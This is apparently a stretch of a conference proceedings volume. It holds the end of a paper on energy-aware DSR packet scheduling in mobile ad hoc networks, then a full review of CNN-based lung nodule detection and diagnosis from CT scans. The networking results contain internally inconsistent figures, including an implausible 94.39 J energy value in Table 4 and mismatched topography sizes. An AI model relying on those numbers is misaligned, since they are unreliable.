routing in [20]. These routing algorithms have higher overheads and are suitable
for ad hoc networks with moving nodes.

2 Related Work

In designing and deploying energy efficient intelligent transportation systems, mobile
ad hoc networks become the main element of intelligent transport systems (ITS). They
face many challenging issues, including instability of wireless communications,
architectural inflexibility, limited transmission range, and repeated variations in
node topology due to very high node mobility. One of the latest challenges
VANETs face is establishing effective data transmission to nearby areas where roadside
units are not in place, called communication coverage holes [21].
Nowadays, the performance and efficiency of vehicular ad hoc networks in
intelligent transportation systems are affected. Finding the best routing protocol in dynamic
vehicular networks is one of the important challenges. The ant colony hybrid routing
protocol (ACOHRP) has been suggested to improve the quality of service of intelligent
transportation systems (ITS) by enhancing the reliability and efficiency of vehicle traffic
information message transmission [22]. The quality of service of the network is improved
using the optimal energy consumption protocol (OECP). Residual hop count, residual energy, and
expected delay are the metrics which identify the next node while forwarding the
packets. Fuzzy logic is useful while aggregating the data, and the computed values
of the above parameters are used to identify the forwarding node. Simulation is carried
out using NS2, and it proves that OECP has a higher packet delivery ratio with lower
energy consumption and end to end delay [23].
For quickly changing topologies, an RPL-based IoT network has been proposed to reduce
power consumption. A mobility level is defined for a node in the RPL network to estimate
the movement of neighboring nodes. The node adjusts the interval of its
control messages depending on the mobility level value. This way the path
is kept updated, and it helps to reduce the power consumption.

3 Methodology

Looking at the ongoing demand for IoT-enabled networks and the various advancements
in mobile networks, there is a need to propose an energy efficient battery management tech-
nique. We propose a mobile ad hoc network for a grid scenario in which the scheduling of
packets is controlled using Pareto and exponential distributions while setting the interar-
rival time between packets. In the proposed network, the probability density func-
tions and cumulative distribution functions are derived for the Pareto and exponential
distributions. The cumulative distribution functions of Pareto-distributed and expo-
nentially distributed traffic have uniform energy density; for this reason, packets
are scheduled uniformly with less consumption of energy.
Figure 1 shows the proposed methodology of the packet scheduling algorithm, where
networks with varying node scenarios are tested using DSR, the proposed DSR with
Pareto, and DSR with exponential distribution. The packet delivery and residual energy
of the proposed algorithm are compared with the existing DSR protocol.
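To make the scheduling idea concrete, the short Python sketch below draws packet interarrival/burst times from Pareto and exponential distributions using the burst-time and shape values of Tables 2 and 3. It is only an illustration (the actual experiments configure these distributions inside NS2 traffic sources), and the scale derivation for the Pareto case is our assumption.

```python
import numpy as np

def pareto_interarrivals(n, shape=1.2, mean_burst_ms=500.0, seed=0):
    # Classical Pareto samples whose mean equals the configured burst time.
    # For shape > 1 the mean is scale * shape / (shape - 1), so invert that relation.
    rng = np.random.default_rng(seed)
    scale = mean_burst_ms * (shape - 1.0) / shape
    return scale * (1.0 + rng.pareto(shape, size=n))

def exponential_interarrivals(n, mean_ms=500.0, seed=0):
    # Exponentially distributed interarrival times with the same mean burst time
    rng = np.random.default_rng(seed)
    return rng.exponential(mean_ms, size=n)

print(pareto_interarrivals(5).round(1))
print(exponential_interarrivals(5).round(1))
```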

Fig. 1 Proposed methodology

Algorithm

Input to wireless network
Input 1: select number of nodes <n1, n2, ..., tn> belonging to the network
Design Network
1. Start
2. For each node in Network do
3. (1.1) Select MAC
4. (1.2) Select Antenna
5. (1.3) IFQ length
6. (1.4) Propagation
7. (1.5) Topographical dimensions
8. (1.6) Transmit power
9. (1.7) Receiving power
10. (1.8) Sense power
11. (1.9) Idle power
Input 2:
12. Start
13. For each Node in the Network do
14. (2.1) Deploy nodes in grid fashion
15. (2.2) Assign transmission to nodes
16. (2.3) Assign receiving nodes
17. (2.4) Assign velocity to nodes
18. (2.6) Simulate network tcl script

Network performance parameters
Info: For a mobile network
19. Start
20. Analyze TCL file with AWK script
21. Calculate number of packets sent
22. Calculate number of packets received
23. Calculate packet delivery ratio
24. Calculate average residual energy
25. Calculate overall residual energy
26. Calculate total energy consumption
27. End For
28. End
Output: Packet delivery ratio / average residual energy / overall residual energy
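Steps 19–28 above reduce to simple arithmetic over the trace statistics. In the paper this post-processing is done with an AWK script over the NS2 trace file; a minimal Python sketch of the same calculations, using the packet counts of Table 4 as a check, could look as follows.

```python
def packet_delivery_ratio(sent, received):
    # PDR (%) = packets received / packets sent * 100 (step 23)
    return 100.0 * received / sent

def average_residual_energy(overall_residual_j, n_nodes):
    # Average residual energy = overall residual energy / number of nodes (step 24)
    return overall_residual_j / n_nodes

# Packet counts from Table 4, DSR with exponential scheduling for 50 nodes
print(round(packet_delivery_ratio(sent=1665, received=1624), 2))  # -> 97.54
```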

4 Results

Networks are proposed for mobile nodes to observe and test the performance of
packet scheduling algorithm for packet delivery and residual energy of network.
Ad hoc network is set for 50 moving nodes in grid scenario with the configuration
parameters specified in Table 1. Network density is varied from 10 to 50 nodes.
Network is simulated for 10 s in NS2. Network is tested for various performance
parameters for DSR, DSR with Pareto, and DSR with exponential arrival pattern of
packets as explained in Table 4. Figure 2 shows the network set up for 50 mobile
nodes in a grid scenario. Network topography is configured for 4700 × 472 m. Network
is simulated for 10 s. Node movements are also created with pause time as 10 s and
velocity as 20 m/second for nodes n0, n1, n2, n3, n4, n5, n6, n7, n8, n9, n20, n21,
n22, n23, n24, n25, n26, n27, n28 and n29 (Tables 2 and 3).
Performance of the network is tested for 50 mobile nodes with DSR, DSR with
Pareto, and DSR with exponential method as discussed in Table 4. Results show that
packet delivery of the network is improved from 93.58 to 95.95% in the case of DSR
with Pareto, with a good amount of residual energy. Also, packet delivery is improved
from 93.58 to 97.54% with exponential distribution and improvement in residual
energy from 4.05 to 4.14 J.

Table 1 Configuration parameters for wireless ad hoc network: 50 mobile nodes in grid topology
Sr. No  Parameter  Value
1  Channel  Wireless channel
2  Propagation  Two ray ground
3  MAC  802_11
4  Antenna  Omni antenna
5  Number of nodes  50
6  IFQ length  50
7  Routing protocol  DSR
8  X (m)  4007
9  Y (m)  100
10  Simulation time (s)  10.0
11  Initial energy (J)  5
12  Tx power (W)  0.9
13  Rx power (W)  0.8
14  Sense power (W)  0.0175
15  Idle power (W)  0.0

Fig. 2 NAM file of 50 nodes in grid scenario

Table 2 Parameters of Pareto distribution for 50 nodes
Sr. No  Parameter  Value
1  PKT size  210
2  Burst time (ms)  500
3  Idle time (ms)  500
4  Rate (K)  1
5  Shape  1.2

Table 3 Parameters of exponential distribution for 50 nodes
Sr. No  Parameter  Value
1  PKT size  100
2  Burst time (ms)  500
3  Idle time (ms)  500
4  Rate (K)  1

Table 4 Performance comparison of DSR, DSR with Pareto, and DSR with exponential for 50 nodes
Sr. No  Parameter  DSR  DSR with Pareto  DSR with Expo
1  Number of packets sent (Bytes)  1667  1545  1665
2  Number of packets received (Bytes)  1590  1482  1624
3  PDR (%)  93.58  95.95  97.54
4  Total energy consumption (Joule)  46.25  46.85  41.42
5  Average energy consumption (Joule)  94.39  0.95  0.85
6  Overall residual energy (Joule)  198.7  196  203.04
7  Average residual energy (Joule)  4.05  4.04  4.14

Figure 3 shows the NAM file deployed for 40 mobile nodes. The network topography
is set for 5894 × 428 m. The network is simulated for 10 s. Node movements are also
created with a pause time of 10 s and a velocity of 20 m/second for nodes n0, n1, n2,
n3, n4, n5, n6, n7, n8, n9, n20, n21, n22, n23, n24, n25, n26, n27, n28, and n29.
The performance of the network tested for 40 mobile nodes with the DSR protocol, DSR
with Pareto, and DSR with the exponential approach is specified in Table 5.
It shows that packet delivery is improved from 67.02 to 89.22% in the case of the DSR
with Pareto approach, and the residual energy is improved from 3.74 to 4.05 J. Also,
the packet delivery of the network is improved from 67.02 to 83.37% for DSR with
the exponential approach, and the residual energy is improved from 3.74 to 3.96 J.

5 Conclusion

In this paper, a novel packet scheduling algorithm is proposed to improve the packet
delivery ratio and residual energy of IOT-enabled networks. In contrast to the previous

Fig. 3 NAM file of 40 nodes in grid scenario

Table 5 Performance parameters for DSR, DSR with Pareto, and DSR with exponential for 40 mobile nodes in mobile scenario

Sr. No  Parameter                            DSR      DSR with Pareto  DSR with exponential
1       Number of packets sent (Bytes)       1331     1568             1684
2       Number of packets received (Bytes)   892      1399             1404
3       PDR (%)                              67.02    89.22            83.37
4       Total energy consumption (Joule)     49.08    36.91            40.14
5       Average energy consumption (Joule)   1.25     0.946            1.029
6       Overall residual energy (Joule)      145.892  158.06           154.83
7       Average residual energy (Joule)      3.74     4.05             3.96

In contrast to previous studies, our scheme combines traffic data scheduling with the proposed Pareto- and exponentially distributed traffic to form a routing policy. Packet delivery of the network improves by around 17% over normal routing using DSR, and energy is saved even at this higher packet delivery ratio. Packets are scheduled uniformly using the cumulative distribution function; since the energy parameters are proportional to the cumulative distribution function, energy saving follows from the proposed approach.


Dr. Suresh Kurumbanshi is working as Assistant Professor in NMIMS University, Shirpur Campus. His research areas include wireless ad hoc networks, industrial IoT, and automation. He has more than 20 years of teaching experience. He has been granted an RPS grant for carrying out research on the computational capacity of vehicular ad hoc networks. He is a reviewer of IEEE Circuits and Systems and IEEE Access. He is a certified trainer in Automation Technology for the Bosch Rexroth Centre of Excellence in Automation.

Dr. Shubhangi Vikas Rathkanthiwar is presently working as Professor in the Department of Electronics Engineering, YCCE, Nagpur, India. Her areas of expertise are wireless communications and soft computing. She has 80 research papers to her credit. Her book 'An Intelligent Wireless LAN System: Performance Evaluation in Fading Multipath Environment' was published in Germany. She is a recognized reviewer of the journal Applied Soft Computing (Elsevier), IEEE Transactions on Vehicular Technology, and IEEE Transactions on Industrial Electronics. She has been granted a patent on performance improvement of an OFDM transceiver system through a self-organizing artificial neural network by the Government of India. She is a recipient of the Best Research Paper award, the Best Teacher award, and the 'Shikshak Ratna' award.

Prof. Shashikant Patil (Senior Member IEEE & Senior Member, ACM) is a prominent educationist, teacher, renowned engineer, researcher, and innovator. He has received numerous accolades for his valuable contributions and achievements in education and research. Prof. Patil is nominated as Fellow Member of IETE (FIETE), Fellow of the Institute of Biomedical Engineers (FIBE), Fellow of the Optical Society of India (FOSI), and Fellow of the Institution of Engineers India (FIE). He is also designated as a Chartered Engineer (C.Eng.) of the Institution of Engineers. Presently he is working as an Associate Professor in SVKM's NMIMS Mumbai, India. Additionally, he serves as an Associate Editor, Editorial Board Member, Technical Advisory Board Member, Potential Peer Reviewer, and Journal Referee for Scopus- and SCI-indexed journals. He is also associated with Elsevier Editorial Series, Taylor and Francis, and Springer Link journals as a potential peer reviewer and journal referee. Besides this, he is an active reviewer for many IEEE conferences of international repute.
Computer-Aided Detection
and Diagnosis of Lung Nodules Using CT
Scan Images: An Analytical Review

Nikhat Ali and Jyotsna Yadav

Abstract Cancer is one of the leading causes of mortality worldwide, lung cancer being one of the deadliest. Early detection and accurate diagnosis of lung nodules can save many lives and resources. A number of diagnostic radiology modalities are utilized for the detection of lung nodules, of which computed tomography (CT) scans provide better discernment of the disease and have thus been explored extensively for automatic nodule analysis. However, manual analysis of radiological images is time-consuming and prone to human errors such as detection and interpretation errors. On the other hand, a computer-aided detection and diagnosis (CAD) system eliminates the manual process and the problems associated with it. In this work, an analytical review of various CAD systems for detection and characterization of lung nodules using CT scan images is presented. A detailed structure of each component of the CAD system is given. Diverse CAD systems developed on the basis of state-of-the-art convolutional neural networks (CNN), such as 3D-CNN, transferable CNN, dense convolutional binary tree network, gated dilated network, and mask region CNN, are addressed. The algorithms' performance is compared based on metrics such as sensitivity (SEN), accuracy (ACC), and area under the curve (AUC). In order to develop a more robust end-to-end system, the coupling between detection and diagnostic components is also explored. Finally, current challenges faced in the analysis and characterization of lung nodules by present systems and future research opportunities in this field are discussed.

Keywords Computer-aided detection and diagnosis (CAD) · Lung cancer · Lung


nodules · Nodule detection · Classification · Convolutional neural network
(CNN) · Computed tomography (CT) scan

N. Ali · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, New Delhi, India
e-mail: jyotsnayadav@ipu.ac.in


1 Introduction

Cancer is an abnormal growth of cells which can spread to different body parts. Tumors or neoplasms are lumps or masses of tissue and can be either cancerous (malignant) or non-cancerous (benign). According to the 2020 WHO report on cancer, 18.1 million people had cancer around the world, 9.6 million deaths were caused by it, and the estimated numbers will double by 2040. The most frequently diagnosed cancer is lung cancer (11.6% of all cases), with a mortality rate of 18.6% of all cases [1]. Lung cancer can be grouped into two types, namely non-small cell lung cancer (NSCLC) and small cell lung cancer (SCLC). Compared to NSCLC, SCLC grows and spreads quickly. In most cases it is observed that, by the time it is diagnosed, the cancer has already spread. Especially for this type of situation, early detection is crucial. A CAD system can be employed to efficiently detect and diagnose cancer. The main requirements of such a system are high accuracy, high sensitivity, and low false positives.
Lung nodule analysis is the most effective form of cancer prevention and broadly consists of two steps, namely nodule detection and classification into cancerous and non-cancerous [2]. Because lung nodules vary in shape, size (3–30 mm), density (solid, semi-solid, ground-glass opacity), and location (central, juxta-pleural, juxta-vascular), it is hard to generalize any specific categories [3, 4]. This variability in nodule characterization makes diagnosis a difficult task. However, most studies suggest that large (diameter more than 8 mm), semi-solid, and lobulated nodules are more likely to be malignant [5, 6]. Effective screening and correct interpretation of lung cancer are crucial steps toward early diagnosis. Advancements in computed tomography (CT) imaging and screening with low-dose CT (LDCT) have shown promising improvements in nodule detection.
With the immense popularity of LDCT screening and the increase in CT scans, the job of the radiologist becomes more difficult, as manual analysis of volumetric CT scans is time-consuming and also prone to interpretation and detection errors. To reduce the workload of radiologists, an automatic computer-aided detection and diagnosis system is necessary. The CAD system is one of the effective cancer control interventions and is helpful in early detection of malignancy and classification [7]. There has been extensive research on various models and algorithms of CAD systems in order to make them more efficient in terms of disease detection and classification. A typical CAD system can be grouped into two parts: the computer-aided detection (CADe) system and the computer-aided diagnosis (CADx) system. The CADe system aims at nodule localization, whereas CADx is designed to determine whether a suspicious candidate is benign or malignant and to categorize its type. Specifically, a CAD system consists of four stages: preprocessing, nodule identification, feature extraction/selection, and nodule classification [8, 9].
In this review, the structure of the CAD system is first briefly presented, along with the various algorithms developed for each component. Some of the efficient state-of-the-art CNN schemes, such as 3D-CNN (feature extraction using a residual network) [10], V-Net [11], transferable texture CNN [12], U-Net [13], faster region CNN (RCNN) [14], mask-RCNN [15], RetinaNet (R-Net), Inflated 3D R-Net (I3DR-Net) [16], and Leaky

Integrate and Fire Networks (LIF-Nets) [17] are also explored. Compared to tradi-
tional machine learning algorithms, deep learning has shown significant improve-
ment with respect to nodule identification and characterization. The main aim of this
review is to explicitly present each component along with reliable algorithms devel-
oped in the respective domain, as described in Fig. 1. The experimental benchmarks
necessary for the research work in this field like database and evaluation metrics
are also emphasized. Finally, existing challenges faced by CAD system in accurate
diagnosis of lung nodule, research trends, and future developments in CAD system
are discussed.
The work is divided into four sections: the first section describes the anatomical structure of the CAD system along with the various algorithms developed; the second section presents the experimental benchmarks; the third section compares the algorithms and methods that we have surveyed; and the last section provides a brief conclusion with future research prospects.

Fig. 1 Diagrammatical presentation of various algorithms developed in the respective domains of the CAD system

2 Anatomy of CAD System

CAD system is broadly categorized into two modules, one used for nodule detection
and localization called computer-aided detection (CADe) system and other used for
classification of detected nodule into cancerous and non-cancerous called computer-
aided diagnosis (CADx) system [18]. In order to be applicable to clinical diagnosis
and reduce radiologist workload, these systems have to be combined to perform as
end-to-end system which does the complete work of detection and classification of
lung cancer [2].
A CADe system for detection of nodules using CT scans can be divided into two parts. The first part consists of the image processing components: preprocessing (lung segmentation and nodule enhancement) and nodule detection (initial nodule identification and nodule segmentation) [15, 19]; the second part consists of the feature analysis components [20]. The aim of the image processing components is to detect, i.e., localize and segment, suspicious regions in CT images with high sensitivity, as a result of which the number of false positives also increases. The purpose of the feature analysis components is to reduce false positives by analyzing nodule features while maintaining high detection sensitivity; for example, FPs are reduced by varying the slab thickness in maximum intensity projection (MIP) images [21]. CADx schemes are developed to categorize detected nodules into benign or malignant [22–24]. The input provided to this system is the nodule location, which can be fed manually or by coupling with a CADe system. Generally, a CADx system involves the following stages: nodule segmentation [25, 26], feature engineering/learning (feature extraction/selection), and nodule classification [27]. CNN-based networks show better results than traditional machine learning methods.
The end-to-end CAD systems consist of a combination of CADe and CADx schemes [16, 28], with components as shown in Fig. 2. A system that only detects nodules and does not characterize them is not enough for clinical application, and thus a complete CAD system which performs end-to-end detection and classification is necessary. In the next section, the components of the CAD system are covered in detail.

Fig. 2 CAD system structure



2.1 Preprocessing

The images fed into the system are preprocessed, as CT images are 3D volumes degraded by noise and artifacts [25]. Preprocessing is done to eliminate noise and enhance contrast. In general, preprocessing is an image processing stage which performs tasks such as noise elimination [28], lung segmentation and mending of the lung contour [20, 29, 30], and nodule enhancement [19, 31]. CT scan images contain two types of noise: the first type is radiographic noise, caused by electronic elements, and the second type is anatomical noise. Anatomical noise is caused by the projection of local anatomical structures, such as ribs and pulmonary vessels, onto chest scans, which makes nodule detection a difficult task. In order to reduce noise and enhance nodule-like structures, CT images are passed through filters; commonly used ones are the median filter, Gaussian filter [32], dot enhancement filter, NLM filter, histogram equalization, and adaptive Wiener filter [33]. Data augmentation is crucial while training a model, as it helps to reduce overfitting and thus maximizes transfer learning. Ozdemir et al. [2] performed transform augmentation consisting of 3D rotations, reflections, and 3D scaled samples.
Lung segmentation: Nodules are present within the lungs, so in order to perform nodule detection, the first requirement is to segment the lung. The steps involved in lung segmentation are described in Fig. 3.
Kuo et al. [19] first optimized the images using an adaptive Wiener filter; lung segmentation is then performed using a fast Otsu algorithm along with an edge search method, which is identical to the hole-filling and histogram shifting methods. Rey et al. [20] applied Otsu-algorithm-based lung segmentation, used a morphological closing operator for filling interior lung cavities, and used a 3D region growing algorithm for lung isolation. Zhang et al. [29] performed four steps to extract the lung parenchyma: the first step is histogram-based threshold segmentation used to obtain various gray levels for lung mask generation; the next step removes anatomical noise, with a padding operator used for hole-filling; the third step is lung contour mending to include juxta-pleural nodules, which would otherwise get eliminated; and in the last step the corrected lung parenchyma contour is segmented. Gong et al. [34] adopted the Otsu threshold segmentation method, with a 3D region growing algorithm applied to segment and extract the lobes of the lung. Gong et al. [13] obtained the lung region mask by using convex hull and dilation
to make sure it includes all nodules. To overcome the juxta-pleural nodule issue (these nodules are attached to the chest wall and generally get excluded as noise when lung segmentation is performed), Chung et al. [35] used the Chan-Vese (CV) model along with a Bayesian approach.

Fig. 3 Lung segmentation
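As a rough illustration of the generic pipeline in Fig. 3 (thresholding, contour mending, hole-filling), the following Python sketch builds a per-slice lung mask with scikit-image and SciPy. It is a simplified stand-in under assumed inputs (a 2D axial slice in Hounsfield units, helper name ours); the actual pipelines of [19, 20, 29, 34] include further steps such as 3D region growing and juxta-pleural correction.

```python
import numpy as np
from scipy import ndimage as ndi
from skimage import filters, measure

def lung_mask_from_ct_slice(hu_slice, closing_radius=3):
    """Rough lung mask for one axial CT slice given in Hounsfield units."""
    # 1. Otsu threshold separates air/lung (low HU) from soft tissue and bone.
    binary = hu_slice < filters.threshold_otsu(hu_slice)

    # 2. Remove the background air that touches the image border.
    labels = measure.label(binary)
    border_labels = np.unique(np.concatenate(
        [labels[0, :], labels[-1, :], labels[:, 0], labels[:, -1]]))
    lungs = np.isin(labels, border_labels, invert=True) & binary

    # 3. Keep the two largest connected components (left and right lung).
    labels = measure.label(lungs)
    sizes = np.bincount(labels.ravel())
    sizes[0] = 0
    keep = np.argsort(sizes)[-2:]
    lungs = np.isin(labels, keep[sizes[keep] > 0])

    # 4. Morphological closing and hole filling mend the lung contour so that
    #    juxta-pleural nodules are less likely to be cut away with the chest wall.
    structure = np.ones((2 * closing_radius + 1,) * 2, dtype=bool)
    lungs = ndi.binary_closing(lungs, structure=structure)
    return ndi.binary_fill_holes(lungs)
```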

2.2 Nodule Detection

After the segmentation of the lung, the next stage is nodule identification, which involves candidate detection and reduction of false positives [36, 37]. Lung nodules vary in shape, size, density, location, and texture, and thus detecting them is a tedious task. Owing to this variability, various techniques have been developed over the decades. Traditional machine learning tools were time-consuming and lacked learning adaptability. With the enormous development of deep convolutional neural networks (DCNNs), automatic nodule detection and characterization performance has improved tremendously [13–18, 28].
Shaukat et al. [31] first enhanced nodule images using a multi-scale dot enhancement filter based on the Hessian matrix, and lung nodules were then detected using optimal thresholding on the enhanced images. Zheng et al. [21, 38] used four streams of maximum intensity projection (MIP) images with four slab thicknesses to train 2D CNNs for localizing and detecting nodules. Zhang et al. [29] presented an efficient nodule detection system based on a multi-scene deep learning framework (MSDLF) with a vessel-removing filter, applying a four-channel CNN for four levels of nodule. Kuo et al. [19] suggested using a support vector machine (SVM) twice in order to reduce false positives: once for nodule detection using four 2D features and again for classification using eleven 3D features. Micro-nodule (diameter smaller than 3 mm) detection is the most difficult job, and Monkam et al. [39] developed a system based on ensemble learning of multi-view 3D CNNs to distinguish between micro-nodules and non-nodules. Chenyang et al. [40] proposed a jointly optimized nodule segmentation and classification (JNSC) method which adopts V-Net as the backbone. Cai et al. [15] exploited a two-stage Mask R-CNN for nodule detection and segmentation, where the first stage is a region proposal network (RPN) and the second stage outputs confidence scores. Li et al. [25] adopted a generalized method of moments fuzzy C-means (GMMFCM) algorithm for segmentation of pulmonary nodules. To eliminate false positives, Chung et al. [35] used concave point detection and the circle or ellipse Hough transform.
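Many of the detectors above score small volumetric patches around candidate locations with a 3D CNN to reject false positives. The PyTorch sketch below shows what such a 3D patch classifier can look like; the architecture, patch size (32 cubed), and layer widths are illustrative assumptions and do not reproduce any of the cited networks.

```python
import torch
import torch.nn as nn

class Nodule3DCNN(nn.Module):
    """Minimal 3D CNN that scores a candidate patch as nodule vs. non-nodule."""

    def __init__(self, in_channels=1, num_classes=2):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv3d(in_channels, 16, kernel_size=3, padding=1),
            nn.BatchNorm3d(16), nn.ReLU(inplace=True), nn.MaxPool3d(2),
            nn.Conv3d(16, 32, kernel_size=3, padding=1),
            nn.BatchNorm3d(32), nn.ReLU(inplace=True), nn.MaxPool3d(2),
            nn.Conv3d(32, 64, kernel_size=3, padding=1),
            nn.BatchNorm3d(64), nn.ReLU(inplace=True),
            nn.AdaptiveAvgPool3d(1),          # global pooling -> (B, 64, 1, 1, 1)
        )
        self.classifier = nn.Linear(64, num_classes)

    def forward(self, x):                     # x: (B, 1, D, H, W), e.g. 32x32x32 patches
        x = self.features(x).flatten(1)
        return self.classifier(x)

model = Nodule3DCNN()
scores = model(torch.randn(4, 1, 32, 32, 32))  # logits for 4 candidate patches
print(scores.shape)                            # torch.Size([4, 2])
```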

2.3 Feature Extraction/Selection

Once a nodule is identified, numerous nodule candidates are generated, and most of them are false positives. Features are measurable, distinctive attributes of the segmented regions that capture the prominent characteristics of nodules. Features can be grouped based on shape, size, density, texture, and intensity [41, 42]. Wang et al. [36] proposed a mathematical descriptor using neighbor-centroid clustering for spatial feature extraction; an edge-oriented histogram (EOH) is used to extract edge features, and multi-scale path LBP (MSPLBP) is used for texture feature extraction. Sun et al. [26] employed a multi-view network [27, 43] for feature extraction, as shown in Fig. 4. Masood et al. [18] explored a multi-dimensional region-based fully convolutional network (mRFCN) as the image-classifier backbone for feature extraction. Gu et al. [8] proposed a multi-level feature-mapping-layer method, and Tong et al. [10] extracted candidate features using a 3D residual network, with a multiple kernel learning (MKL) algorithm used to learn heterogeneous features. Li et al. [28] employed a genetically optimized convolutional neural network for feature extraction from nodule CT images.

Fig. 4 Multi-view feature extraction model
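Texture descriptors such as the multi-scale LBP mentioned above are typically histograms of local binary pattern codes computed at several radii. The following sketch, using scikit-image's local_binary_pattern, is a simplified stand-in for such features; the radii, sampling points, and the uniform-LBP variant are assumptions, not the exact MSPLBP of [36].

```python
import numpy as np
from skimage.feature import local_binary_pattern

def multiscale_lbp_histogram(patch, radii=(1, 2, 3), points_per_radius=8):
    """Concatenate uniform-LBP histograms of a 2D patch computed at several radii."""
    feats = []
    for r in radii:
        p = points_per_radius * r                      # more sampling points at larger radii
        codes = local_binary_pattern(patch, P=p, R=r, method="uniform")
        hist, _ = np.histogram(codes, bins=np.arange(p + 3), density=True)  # codes in [0, p+1]
        feats.append(hist)
    return np.concatenate(feats)

patch = np.random.rand(64, 64)                         # placeholder for a nodule ROI
print(multiscale_lbp_histogram(patch).shape)           # 10 + 18 + 26 = 54 bins
```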

2.4 Classification

The last stage of diagnosis is nodule classification as benign (non-cancerous) or malignant (cancerous). Once nodule candidates are detected, features are selected to train the system, which then predicts malignancy. Various classification techniques are employed: ML-based classifiers such as SVM [10, 20, 43, 45], the k-nearest neighbor classifier [45], and the Bayesian classifier [46], as well as CNN-based classification [18, 24, 27, 44]. Ozdemir et al. [2] performed 3D CNN classification employing a multiple instance learning framework to train the network efficiently. Ali et al. [12] applied a transferable texture-based CNN model to improve classification, and the mRFCN-based automated decision support system [18] has also been used for nodule classification. A multi-task CNN framework for 3D nodule classification [47] and a multi-branch ensemble learning architecture based on 3D CNNs [48] are other suitable algorithms. Figure 5 shows a general classification model.

Fig. 5 Classification model

3 Experimental Benchmarks

Implementation of a successful CAD system broadly depends on two experimental benchmarks: large datasets and performance evaluation metrics. CAD is an automated system generally based on machine learning or, more recently, deep learning algorithms; thus, large CT scan datasets are required for training and testing the system. The effectiveness of different systems is assessed using a set of standard parameters.

3.1 Datasets of Lung CT Scans

One of the most widely used publicly available databases is the Lung Image Database Consortium and Image Database Resource Initiative (LIDC-IDRI), one of the largest public databases for lung cancer. It consists of 1018 cases that include clinical thoracic CT scans with annotations in XML file format [49]. National Lung Screening Trial (NLST) dataset: around 54,000 participants were enrolled (2002–2004), and data on cancer diagnoses and deaths were collected through December 31, 2009 [50]. The Vision and Image Analysis group and International Early Lung Cancer Action Program (VIA/I-ELCAP) database consists of 50 LDCT scans with 1.25 mm slice thickness, and the nodule sizes in this database are quite small [51]. The Nederlands–Leuvens Longkanker Screening Onderzoek trial (NELSON) consists of LDCT scans, with data from approximately 15,822 participants. Each set of images in DICOM format has 1 mm slice thickness with 0.7 mm overlap between slices, with annotations generated either with LungCare software or manually [52].

3.2 Evaluation Metrics

Accuracy, TPR, and FPR. The parameters required for the calculation of accuracy, true positive rate (TPR), and false positive rate (FPR) are: true positives (TP), true negatives (TN), false positives (FP), and false negatives (FN) [10, 36]. TPR, also known as sensitivity or recall, is given by Eq. 1, FPR is given by Eq. 2, and accuracy, which measures exactness with respect to the original samples, is given by Eq. 3.

Sensitivity/TPR/Recall = TP / (TP + FN)    (1)

FPR = FP / (FP + TN)    (2)

Accuracy = (TP + TN) / (TP + TN + FP + FN)    (3)

CPM. Competition performance metric takes the average sensitivity at predefined FPRs such as 0.125, 0.25, 0.5, 1, 2, 4, 8 FPs per scan, as described by Eq. 4.

CPM = (1/7) · Σ_{i ∈ FPs} s(i),   FPs = {0.125, 0.25, 0.5, 1, 2, 4, 8}    (4)
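For reference, the metrics of Eqs. 1–3 and the CPM of Eq. 4 can be computed from raw counts and FROC operating points as in the small Python helpers below; the numeric values in the example call are made up purely for illustration.

```python
def sensitivity(tp, fn):
    return tp / (tp + fn)                          # Eq. 1 (TPR / recall)

def fpr(fp, tn):
    return fp / (fp + tn)                          # Eq. 2

def accuracy(tp, tn, fp, fn):
    return (tp + tn) / (tp + tn + fp + fn)         # Eq. 3

def cpm(sens_at_fp):
    """Eq. 4: average sensitivity at 1/8, 1/4, 1/2, 1, 2, 4 and 8 FPs per scan.

    `sens_at_fp` maps each predefined FP-per-scan rate to the sensitivity read
    off the FROC curve at that operating point.
    """
    rates = (0.125, 0.25, 0.5, 1, 2, 4, 8)
    return sum(sens_at_fp[r] for r in rates) / len(rates)

# Example with made-up numbers
print(accuracy(tp=90, tn=880, fp=20, fn=10))       # 0.97
print(cpm({0.125: 0.70, 0.25: 0.78, 0.5: 0.84, 1: 0.88, 2: 0.91, 4: 0.93, 8: 0.95}))
```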

4 Discussion

The CAD systems based on the various algorithms are compared on two factors: how efficiently a system can detect a nodule, and how well it discriminates nodules into benign and malignant with reduced FPs. Table 1 gives the comparison between the different algorithms used for nodule detection, and Table 2 gives the comparison between classification systems.

5 Conclusion

In this work, a detailed review of various algorithms of CAD systems developed for detection and diagnosis of lung cancer using CT images is presented, and the algorithms adopted for nodule detection and classification are compared. Among the papers discussed, the method proposed by Li et al. [25] (GMMFCM) shows the best performance for nodule detection, and the transferable texture-based CNN classification method of Ali et al. [12] provides comparatively better accuracy. Systems employing multi-dimensional CNN algorithms such as multi-view, multi-task, multi-section, texture-based, and hybrid feature extraction have shown remarkable performance compared to general CNN networks. One of the main challenges faced by CAD systems is the lack of publicly available databases; hence there is a need to work more on prominent unsupervised learning methodologies. Vessel segmentation is another

Table 1 Comparison between different nodule detection models

S. No  First author, publication year  Algorithm                       Outcome
1      Ye et al. [11], 2020            Modified V-Net, SVM classifier  0.934 (SEN for 8 FPs/scan)
2      Kuo et al. [19], 2020           SVM                             91% (SEN)
3      Rey et al. [20], 2020           SVM (C-SVC)                     82.9% (SEN)
4      Zheng et al. [21], 2020         MIP slab thickness 9 mm         90% (SEN)
5      Li et al. [25], 2020            GMMFCM                          0.9998 (ACC), 0.9756 (SEN)
6      Zhang et al. [29], 2020         MSDLF                           98.7% (efficient)
7      Gu et al. [30], 2020            Vessel suppression              0.986 (SEN)
8      Roy et al. [32], 2020           Unsupervised method             0.90 (SEN), 0.95 (ACC)
                                       Supervised method               0.84 (SEN), 0.95 (ACC)
9      Gong et al. [37], 2020          3D-CenterNet                    90.6 (CPM)
10     Tan et al. [53], 2020           3D-CNN                          0.990 (SEN)

Table 2 Comparison between different classification models


S. No First author, publication year Algorithm Outcome
1 Tong et al. [10], 2021 ResNet-34 + MKL 90.65% (ACC)
2 Ali et al. [12], 2020 Transferable texture CNN 96.69% (ACC)
3 Shi et al. [17], 2020 LIF-classification Net 94.14% (ACC)
4 Zhai et al. [47], 2020 MT-CNN 97.3% (AUC)
5 Kuang et al. [54], 2020 MDGAN + Encoder 95.32% (ACC)
6 Hussein et al. [9], 2019 3D CNN + MTL 91.26% (ACC)
7 Xie et al. [27], 2019 MV-KBC deep model 91.60% (ACC)
8 Sahu et al. [43], 2019 Multi-section CNN 0.98(AUC), 93.18% (ACC)
